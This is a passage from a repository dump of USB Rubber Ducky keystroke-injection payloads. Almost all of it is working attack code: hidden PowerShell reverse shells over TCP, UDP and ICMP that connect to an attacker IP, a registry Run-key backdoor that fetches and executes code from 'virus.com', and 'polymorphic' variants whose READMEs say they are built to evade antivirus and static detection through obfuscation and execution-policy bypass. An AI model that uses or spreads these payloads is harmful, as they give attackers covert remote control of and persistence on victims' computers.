END_IF\r\nEND_EXTENSION\r\n\r\nREM Configure your settings below:\r\nREM Insert the attacking IP between ''\r\nDEFINE ATTACKER '0.0.0.0'\r\nREM Set the default DELAY\r\nDEFINE WAIT 250\r\nREM Do you want to install the dependencies and set up the infratructre?\r\nREM Will trigger when not using Windows - Best use with Linux\r\nDEFINE INSTALL TRUE\r\nREM Link to the PingZhellDucky.pl client - Required for installation\r\nDEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl\r\n\r\n\r\nIF ($_OS == WINDOWS) THEN\r\n DELAY 1500\r\n GUI r\r\n DELAY 500\r\n STRINGLN powershell -NoP -NonI -w h\r\n DELAY 500\r\n STRING ;$Delay=5;$BufferSize=128;$ICMPDucky=New-Object System.Net.NetworkInformation.Ping;$PingDuck=New-Object System.Net.NetworkInformation.PingOptions;$PingDuck.DontFragment = $True;$QuackAttack = ([text.encoding]::ASCII).GetBytes('Ducky@PS '+(gl).Path+'> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null;while ($true){$QuackAttack=([text.encoding]::ASCII).GetBytes('');$reply=$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);$result=(IeX -Command $response 2>&1 | Out-String );$QuackAttack = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($QuackAttack.length/$BufferSize);$i = 0;\r\n DELAY WAIT\r\n STRINGLN if($QuackAttack.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $QuackAttack[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null;$i +=1;};$remainingindex=$QuackAttack.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $QuackAttack[($i*$BufferSize)..($QuackAttack.Length)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null}}else{$ICMPDucky.Send( ATTACKER ,60 * 10000, $QuackAttack, $PingDuck) | Out-Null};$QuackAttack = ([text.encoding]::ASCII).GetBytes(\"`nDucky@PS \" + (pwd).Path + '> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null}else{Start-Sleep -Seconds $Delay}}\r\nELSE\r\n IF INSTALL THEN\r\n DELAY WAIT\r\n STRINGLN echo \"Setting up Infrastructre - Do not interact!\"\r\n DELAY 2000\r\n STRINGLN cpan IO::Socket NetPacket::IP NetPacket::ICMP && wget CLIENTLINK && sysctl -w net.ipv4.icmp_echo_ignore_all=1 && echo \"Setup complete!\"\r\n ELSE\r\n STRING Please insert device into a Windows machine or change the settings!\r\nEND_IF\r\nEND_IF\r\n" }, { "path": "payloads/library/remote_access/RegDoor/payload.txt", "content": "REM made by: unknown81311\nGUI R\nREM create registry sting var in the startup registry dir to website with a unique id for identifying.\nSTRING powershell -Command \"`$x=New-Guid;sp Registry::HKCU\\Sof*\\Mic*\\Win*\\Cu*\\Run -name(`$x)\\`\"iwr virus.com?`$x|iex\\`\"\"\nENTER\n" }, { "path": "payloads/library/remote_access/ReverseDucky/ReverseDucky.txt", "content": "REM ReverseDucky\r\nREM Version 2.0\r\nREM OS: Windows / Linux(?) (Not tested with Powershell on Linux)\r\nREM Author: 0i41E\r\nREM Requirement: DuckyScript 3.0\r\n\r\nREM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.\r\nREM Define the attacker IP and PORT at line 38 & 39\r\nREM DON'T FORGET TO START LISTENER\r\n\r\nREM Extension DETECT_READY by Korben for best and fastest deployment\r\nEXTENSION DETECT_READY\r\n REM VERSION 1.0\r\n\r\n REM USAGE:\r\n REM Extension runs inline (here)\r\n REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n REM boot delay\r\n\r\n REM TARGETS:\r\n REM Any system that reflects CAPSLOCK will detect minimum required delay\r\n REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms\r\n\r\n REM CONFIGURATION:\r\n DEFINE RESPONSE_DELAY 25\r\n DEFINE ITERATION_LIMIT 120\r\n\r\n VAR $C = 0\r\n WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))\r\n CAPSLOCK\r\n DELAY RESPONSE_DELAY\r\n $C = ($C + 1)\r\n END_WHILE\r\n CAPSLOCK\r\nEND_EXTENSION\r\n\r\nREM Define the attackers IP & Port\r\nDEFINE ADDRESS '0.0.0.0'\r\nDEFINE PORT 4444\r\n\r\nDELAY 1500\r\nGUI r\r\nDELAY 500\r\nSTRINGLN powershell -NoP -NonI -w h\r\nDELAY 500\r\nSTRINGLN $0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky@PS '+(&('g'+'l'))+'> ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close();exit\r\nCAPSLOCK\r\n" }, { "path": "payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt", "content": "REM ReverseDuckyII\r\nREM Version 2.0\r\nREM OS: Windows / Multi\r\nREM Author: 0i41E\r\nREM Requirement: DuckyScript 3.0\r\n\r\nREM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.\r\nREM If inserted into a non Windows machine, the Ducky will appear broken.\r\nREM DON'T FORGET TO START LISTENER\r\n\r\nREM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS\r\nEXTENSION PASSIVE_WINDOWS_DETECT\r\n REM VERSION 1.0\r\n\r\n REM Windows fully passive OS Detection and passive Detect Ready\r\n REM Includes its own passive detect ready. Does not require\r\n REM additional extensions\r\n\r\n REM USAGE:\r\n REM Extension runs inline (here)\r\n REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n REM boot delay\r\n REM $_OS will be set to WINDOWS or NOT_WINDOWS\r\n\r\n REM CONFIGURATION:\r\n DEFINE MAX_WAIT 150\r\n DEFINE CHECK_INTERVAL 20\r\n DEFINE WINDOWS_HOST_REQUEST_COUNT 2\r\n DEFINE NOT_WINDOWS 7\r\n\r\n VAR $MAX_TRIES = MAX_WAIT\r\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\r\n DELAY CHECK_INTERVAL\r\n $MAX_TRIES = ($MAX_TRIES - 1)\r\n END_WHILE\r\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN\r\n $_OS = WINDOWS\r\n ELSE\r\n $_OS = NOT_WINDOWS\r\n END_IF\r\n\r\n REM EXAMPLE USAGE AFTER EXTENSION\r\n REM IF ($_OS == WINDOWS) THEN\r\n REM STRING HELLO WINDOWS!\r\n REM ELSE\r\n REM STRING HELLO WORLD!\r\n REM END_IF\r\nEND_EXTENSION\r\n\r\nREM Configure your settings below:\r\nREM Insert the attacking IP between '' & define your port\r\nDEFINE ATTACKER '192.168.178.25'\r\nDEFINE PORT 4444\r\nREM Set the default DELAY\r\nDEFINE WAIT 500\r\n\r\nIF ($_OS == WINDOWS) THEN\r\n DELAY 1500\r\n GUI r\r\n DELAY WAIT\r\n STRINGLN powershell -NoP -NonI -w h\r\n DELAY WAIT\r\n STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+\"Ducky@PS \"+(pwd)+\"> \";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit\r\nREM Capslock light will indicate a finished payload\r\n CAPSLOCK\r\nELSE\r\nREM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF\r\n ATTACKMODE OFF\r\nEND_IF\r\n\r\n \r\n" }, { "path": "payloads/library/remote_access/ReverseDuckyIII/payload.txt", "content": "REM ReverseDucky3\nREM Version 1.2 (End of Life - This payload won't be updated anymore)\nREM OS: Windows / Linux(?) (Not tested with Powershell on Linux)\nREM Author: 0i41E\n\nREM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.\nREM Fill in Attacker-IP and Port in Line 18\nREM DON'T FORGET TO START LISTENER: nc -ul -p PORT\n\nDELAY 1500\nGUI r\nDELAY 500\nSTRING powershell -NoP -NonI -W hidden\nDELAY 250\nENTER\n\nDELAY 200\nSTRING $E=New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse(\"0.0.0.0\"),PORT);$C=New-Object System.Net.So\nDELAY 100\nSTRING ckets.UDPClient(53);[byte[]]$B=0..65535|%{0};$SB=([text.encoding]::ASCII).GetBytes('ReverseDuckyIII:');$C.Send($SB,$S\nDELAY 100\nSTRING B.Length,$E);while($true){;$R=$C.Receive([ref]$E);$RD=([text.encoding]::ASCII).GetString($R);$s=(iex $RD 2>&1 | Out-S\nDELAY 100\nSTRING tring );$s2=$s+'Ducky@PS ' + (pwd).Path + '> ';$SB =([text.encoding]::ASCII).GetBytes($s2);$C.Send($SB,$SB.Len\nDELAY 100\nSTRING gth,$E)};$C.Close()\nENTER\n\n\n" }, { "path": "payloads/library/remote_access/ReverseDuckyPolymorph/README.md", "content": "**Title: ReverseDuckyPolymorph**\n\n

Author: 0i41E, Korben
\nOS: Windows
\nVersion: 1.1
\nRequirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

\n\n**What is ReverseDuckyPolymorph?**\n#\n*One of the biggest problems when publishing payloads, exploits, POCs, etc. is static detection. If X hundred or thousand people use your script it's more than burned.*\n*So I created ReverseDuckyPolymorph to fight static detection. Everytime this payload will be used by your Ducky, the variables change and therefore are harder to pin point.*\n*This of course is no guarantee for bypassing every AV, but it may help to bypass certain protections for a longer time.*\n#\n**Instruction**\n\nUsing ReverseDuckyPolymorph is easy and straight forward.\n- First, start a listener on your attacking machine via the tool of your choice.\n- Second, define the IP-Address and Port of your listening machine\n\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png)\n- Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.\n#\nEvery session you will gain via this payload will result in a different ID to verify a different pattern.\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png)\n\nCredit for DS 3.0 implentation and ideas:\n- Korben\n- Nikhil Mittal\n" }, { "path": "payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt", "content": "REM Title: ReverseDuckyPolymorph\nREM Author: 0i41E, Korben\nREM Version 1.1\n\nREM Target: Windows / Linux(?) (Not tested with Powershell on Linux)\nREM Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum\n\nREM Description:\nREM TCP Reverse shell executed hidden in the background, \nREM the CAPSLOCK light at the end will indicate that the payload was executed.\nREM Because of randomisation static detection will be impeded\nREM DON'T FORGET TO START LISTENER BEFORE DEPLOYING ON TARGET\n\nREM REQUIRED: Define the attackers IP & Port\nDEFINE ADDRESS '0.0.0.0'\nDEFINE PORT 4444\n\nREM Extension DETECT_READY by Korben for best and fastest deployment\nEXTENSION DETECT_READY\n REM VERSION 1.0\n\n REM USAGE:\n REM Extension runs inline (here)\n REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n REM boot delay\n\n REM TARGETS:\n REM Any system that reflects CAPSLOCK will detect minimum required delay\n REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms\n\n REM CONFIGURATION:\n DEFINE RESPONSE_DELAY 25\n DEFINE ITERATION_LIMIT 120\n\n VAR $C = 0\n WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))\n CAPSLOCK\n DELAY RESPONSE_DELAY\n $C = ($C + 1)\n END_WHILE\n CAPSLOCK\nEND_EXTENSION\n\nREM Variables for pseudo random variables\nVAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE\nVAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE \nVAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE \nVAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE\nVAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE\nVAR $var_duckID = $_RANDOM_UPPER_LETTER_KEYCODE\nVAR $var_duckID2 = $_RANDOM_NUMBER_KEYCODE\nVAR $var_duckID3 = $_RANDOM_NUMBER_KEYCODE\n\nDELAY 1500\nGUI r\nDELAY 500\nSTRINGLN powershell -NoP -NonI -w h\nDELAY 500\nSTRING $\nINJECT_VAR $var_gibberish\nINJECT_VAR $var_gibberish2\nINJECT_VAR $var_gibberish3\nINJECT_VAR $var_gibberish4\nSTRING =[TyPE]('tExT'+'.enCOD'+'InG');$\nINJECT_VAR $var_gibb3rish\nREM Address and Port of the listening machine\nSTRING =.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$\nINJECT_VAR $var_gibberish4\nSTRING =$\nINJECT_VAR $var_gibb3rish\nSTRING .GetStream();[byte[]]$b=0..65535|&('%'){0};while(($\nINJECT_VAR $var_gibberish4\nINJECT_VAR $var_gibberish3\nINJECT_VAR $var_gibberish\nINJECT_VAR $var_duckID3\nSTRING =$\nINJECT_VAR $var_gibberish4\nSTRING .Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$\nINJECT_VAR $var_gibberish4\nINJECT_VAR $var_gibberish3\nINJECT_VAR $var_gibberish\nINJECT_VAR $var_duckID3\nSTRING );$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky_\nINJECT_VAR $var_duckID\nINJECT_VAR $var_duckID2\nINJECT_VAR $var_duckID3\nSTRING @PS '+(&('g'+'l'))+'> ';$\nINJECT_VAR $var_duckID3\nINJECT_VAR $var_gibberish2\nINJECT_VAR $var_gibb3rish\nSTRING =($\nINJECT_VAR $var_gibberish\nINJECT_VAR $var_gibberish2\nINJECT_VAR $var_gibberish3\nINJECT_VAR $var_gibberish4\nSTRING ::ASCII).GetBytes($Z);$\nINJECT_VAR $var_gibberish4\nSTRING .Write($\nINJECT_VAR $var_duckID3\nINJECT_VAR $var_gibberish2\nINJECT_VAR $var_gibb3rish\nSTRING ,0,$\nINJECT_VAR $var_duckID3\nINJECT_VAR $var_gibberish2\nINJECT_VAR $var_gibb3rish\nSTRING .Length);$\nINJECT_VAR $var_gibberish4\nSTRING .Flush()};$\nINJECT_VAR $var_gibb3rish\nSTRINGLN .Close();exit\nDELAY 100\nCAPSLOCK\n" }, { "path": "payloads/library/remote_access/ReverseDuckyUltimate/README.md", "content": "# Title: ReverseDuckyUltimate\r\n\r\n

Author: 0i41E
\r\nOS: Windows
\r\nVersion: 1.0
\r\nRequirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

\r\n\r\n**What is ReverseDuckyUlitmate?**\r\n#\r\n*ReverseDuckyUltimate (RDU) takes the best of every ReverseDucky payload. Customization, encryption, indentifiers, multi-layer polymorphism and automatic setup!*\r\n*RDU is the ulitmate experience when it comes to remote access via your Rubber Ducky and it's so easy to use!*\r\n#\r\n## Instruction\r\n\r\nUsing ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).\r\n- First: Create key.pem & cert.pem like so:
\r\n```\r\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\r\n```\r\nIt will ask for information about the certificate - Insert whatever you want.
\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)\r\n\r\n- Second: Start a listener on your attacking machine which supports certificates.\r\n\tExamples: \r\n```\r\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]\r\nncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem\r\n```\r\n- Third: Define the IP-Address and Port of your listening machine within the payload, as also if your target is a Windows 11 based system. _Disclaimer: Windows 11 mode will modify the registry. Bad opsec!_\r\n\r\nAdditionally add an unique identifier to give your Duck a name.\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)\r\n\r\n- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.\r\n\r\n## Instruction - Automatic Setup\r\n- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)\r\n\r\n- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)\r\n\r\n- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)\r\n#\r\n\r\n![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)\r\n\r\nCredit for DS 3.0 implentation and ideas:\r\n- Daniel Bohannon\r\n- Grzegorz Tworek\r\n- Korben\r\n- Nikhil Mittal\r\n" }, { "path": "payloads/library/remote_access/ReverseDuckyUltimate/payload.txt", "content": "REM ReverseDuckyUltimate\r\nREM Version 1.3\r\nREM OS: Windows / Unix\r\nREM Author: 0i41E\r\nREM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum\r\nREM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.\r\n\r\nREM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails\r\nEXTENSION PASSIVE_WINDOWS_DETECT\r\n REM VERSION 1.1\r\n REM AUTHOR: Korben\r\n\r\n REM_BLOCK DOCUMENTATION\r\n Windows fully passive OS Detection and passive Detect Ready\r\n Includes its own passive detect ready. \r\n Does not require additional extensions.\r\n \r\n USAGE:\r\n Extension runs inline (here)\r\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n boot delay\r\n $_OS will be set to WINDOWS or NOT_WINDOWS\r\n See end of payload for usage within payload\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #MAX_WAIT 150\r\n DEFINE #CHECK_INTERVAL 20\r\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\r\n DEFINE #NOT_WINDOWS 7\r\n\r\n $_OS = #NOT_WINDOWS\r\n\r\n VAR $MAX_TRIES = #MAX_WAIT\r\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\r\n DELAY #CHECK_INTERVAL\r\n $MAX_TRIES = ($MAX_TRIES - 1)\r\n END_WHILE\r\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\r\n $_OS = WINDOWS\r\n END_IF\r\n\r\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\r\n IF ($_OS == WINDOWS) THEN\r\n STRING HELLO WINDOWS!\r\n ELSE\r\n STRING HELLO WORLD!\r\n END_IF\r\n END_REM\r\nEND_EXTENSION\r\n\r\nREM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell\r\nEXTENSION ROLLING_POWERSHELL_EXECUTION\r\n REM VERSION 1.0\r\n REM Author: 0i41E\r\n REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek\r\n REM Requirements: PayloadStudio v.1.3 minimum\r\n REM Starts Powershell in uncommon ways to avoid basic detection\r\n REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.\r\n\r\n REM CONFIGURATION:\r\n REM Add ExecutionPolicy bypass\r\n DEFINE #EXECUTIONPOLICY FALSE\r\n DEFINE #DELAY 200\r\n\r\n $_RANDOM_MIN = 1\r\n $_RANDOM_MAX = 16\r\n VAR $RANDOM_PS = $_RANDOM_INT\r\n FUNCTION Rolling_Powershell_Execution()\r\n IF ($RANDOM_PS == 1) THEN\r\n STRING cmd.exe /c \"p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid\"\r\n ELSE IF ($RANDOM_PS == 2) THEN\r\n STRING cmd.exe /c \"PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi\"\r\n ELSE IF ($RANDOM_PS == 3) THEN\r\n STRING cmd.exe /c \"P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi\"\r\n ELSE IF ($RANDOM_PS == 4) THEN\r\n STRING cmd /c \"FOR /F \"delims=s\\ t%PSModulePath:~25,1%kens=4\" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H\"\r\n ELSE IF ($RANDOM_PS == 5) THEN\r\n STRING cmd /c \"Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi\"\r\n ELSE IF ($RANDOM_PS == 6) THEN\r\n STRING cmd /c \"p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD\"\r\n ELSE IF ($RANDOM_PS == 7) THEN\r\n STRING cmd.exe /c \"P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi\"\r\n ELSE IF ($RANDOM_PS == 8) THEN\r\n STRING powershell -NoPro -noninT -win h\r\n ELSE IF ($RANDOM_PS == 9) THEN\r\n STRING cmd /c \"p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD\"\r\n ELSE IF ($RANDOM_PS == 2) THEN\r\n STRING powershell.exe -NoP -nOni -W h\r\n ELSE IF ($RANDOM_PS == 10) THEN\r\n STRING cmd /c \"FOR /F \"delims=s\\ tokens=4\" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H\"\r\n ELSE IF ($RANDOM_PS == 11) THEN\r\n STRING powershell -nopr -noninT -W HiddEn\r\n ELSE IF ($RANDOM_PS == 12) THEN\r\n STRING cmd.exe /c \"FOR /F \"delims=s\\ tokens=4\" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi\"\r\n ELSE IF ($RANDOM_PS == 13) THEN\r\n STRING cmd /c \"P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h\"\r\n ELSE IF ($RANDOM_PS == 14) THEN\r\n STRING powershell -noproF -noni -W Hi\r\n ELSE IF ($RANDOM_PS == 15) THEN\r\n STRING cmd /c \"Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi\"\r\n ELSE ($RANDOM_PS == 16) THEN\r\n STRING powershell.exe -noP -nOnI -windo H\r\n END_IF\r\n\r\n IF_DEFINED_TRUE #EXECUTIONPOLICY\r\n SPACE\r\n IF (($RANDOM_PS % 2) == 0) THEN\r\n STRING -ep ByPasS\r\n ELSE IF (($RANDOM_PS % 5) == 0) THEN\r\n STRING -exec bypass\r\n ELSE IF (($RANDOM_PS % 7) == 0) THEN\r\n STRING -exeC byPasS\r\n ELSE IF (($RANDOM_PS % 10) == 0) THEN\r\n STRING -exEcUtionPoL bYpaSs\r\n ELSE IF (($RANDOM_PS % 12) == 0) THEN\r\n STRING -exEcUtion bYPaSs\r\n ELSE\r\n STRING -eP BYPaSs\r\n END_IF\r\n END_IF_DEFINED\r\n ENTER\r\n DELAY #DELAY\r\n END_FUNCTION\r\n REM EXAMPLE USAGE AFTER EXTENSION\r\n REM DELAY 2000\r\n REM GUI r\r\n REM DELAY 2000\r\n REM Rolling_Powershell_Execution()\r\nEND_EXTENSION\r\n\r\nEXTENSION DETECT_FINISHED\r\n REM VERSION 1.0\r\n REM AUTHOR: 0i41E\r\n\r\n REM_BLOCK DOCUMENTATION\r\n USAGE:\r\n Use the function Detect_Finished() to signal the finished execution of your payload.\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #PAUSE 150\r\n FUNCTION Detect_Finished()\r\n IF ($_CAPSLOCK_ON == FALSE)\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n ELSE IF\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n END_IF\r\n END_FUNCTION\r\nEND_EXTENSION\r\n\r\nEXTENSION WINDOWS11_CONSOLE_DOWNGRADE\r\n REM_BLOCK\r\n Version: 1.0\r\n Author: 0i41E\r\n Description: Downgrade the default command prompt of Windows 11 to use Conhost again. \r\n Afterwards PowerShell can be used with paramters like \"-WindowStyle Hidden\" again.\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n REM Used to wait until initial execution\r\n DEFINE #INPUT_WAIT 2000\r\n REM GUID for using the legacy console host for terminal execution\r\n DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D\r\n \r\n FUNCTION Console_Downgrade()\r\n DELAY #INPUT_WAIT\r\n GUI r\r\n DELAY 500\r\n STRINGLN powershell -NoP -NonI\r\n DELAY 1000\r\n STRING Set-ItemProperty -Path \"HKCU:\\Console\\%%Startup\" -Name DelegationConsole -Value \"{#CONHOST}\";\r\n STRINGLN Set-ItemProperty -Path \"HKCU:\\Console\\%%Startup\" -Name DelegationTerminal -Value \"{#CONHOST}\";exit\r\n END_FUNCTION\r\n\r\n REM_BLOCK\r\n EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe.\r\n Console_Downgrade()\r\n DELAY 2000\r\n GUI r\r\n DELAY 2000\r\n STRINGLN powershell -w h\r\n DELAY 1500\r\n STRINGLN calc.exe;exit\r\n END_REM\r\nEND_EXTENSION\r\n\r\nREM Define the attackers IP, Port and Identifier\r\nDEFINE #ADDRESS '0.0.0.0'\r\nDEFINE #PORT 4444\r\nDEFINE #IDENTIFIER Ducky\r\nREM Automatic setup requires openssl!\r\nDEFINE #SETUP FALSE\r\nREM Turn on when target uses Windows 11 - Helps to hide Powershell\r\nDEFINE #WINDOWS11 FALSE\r\n\r\nREM Automatic setup and start listener - Requires openssl!\r\nIF_DEFINED_TRUE #SETUP\r\n IF ($_OS == #NOT_WINDOWS) THEN \r\n DELAY 1500\r\n STRINGLN echo \"Setting up Infrastructre - Do not interact!\"\r\n DELAY 1000\r\n STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo \"Setup complete! Starting listener on Port #PORT \" && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT\r\n ELSE\r\n DELAY 1500 \r\n GUI r\r\n DELAY 1000\r\n STRINGLN notepad.exe\r\n DELAY 250\r\n STRING Setup requires an unix based machine with openssl installed!\r\n END_IF\r\nELSE_DEFINED\r\n IF ($_OS == WINDOWS) THEN\r\n \r\n REM Pseudo random variables for layer one polymorphism\r\n VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE\r\n VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE \r\n VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE \r\n VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE\r\n VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE\r\n VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE\r\n VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE\r\n VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE\r\n \r\n REM Layer two polymorphism\r\n VAR $RANDOM_LAYER = $_RANDOM_INT\r\n \r\n REM Polymorphism function\r\n FUNCTION Polymorphism()\r\n IF (($RANDOM_LAYER % 2) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gIbberish5\r\n ELSE IF (($RANDOM_LAYER % 6) == 0) THEN\r\n STRING $\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish2\r\n INJECT_VAR $var_gibberish\r\n INJECT_VAR $var_gibberish3\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR $var_gibberish\r\n ELSE\r\n STRING $\r\n INJECT_VAR $var_gibberish4\r\n INJECT_VAR 